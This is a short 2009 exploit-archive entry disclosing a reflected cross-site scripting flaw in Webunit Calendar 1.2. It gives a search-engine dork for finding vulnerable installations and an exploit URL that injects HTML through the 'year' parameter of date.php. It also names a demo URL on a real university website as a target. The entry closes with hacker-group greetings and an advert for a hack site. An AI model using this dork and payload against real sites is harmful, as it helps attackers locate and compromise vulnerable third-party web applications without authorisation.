Webunit Calendar 1.2 Cross Site Scripting

2009-04-02T00:00:00
ID PACKETSTORM:76296
Type packetstorm
Reporter r0ot
Modified 2009-04-02T00:00:00

Description

                                        
                                            `=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
Xss Vuln. Found on Webunit Calander 1.2 by r0ot   
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
Dork: inurl:"date.php?year="   
Exploit: http://somesite.com/date.php?year="><h1>lol...</h1>  
  
Demo:  
http://foxtalbot.dmu.ac.uk/letters/date.php?year="><h1>lol...</h1>  
  
  
gr33tz: d14l,Soul,geek,InViSiBle,VuksaLFC,Marcoj,csi and others ;)   
  
Visit x0rg.org [ Your Hack Resource ]   
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-`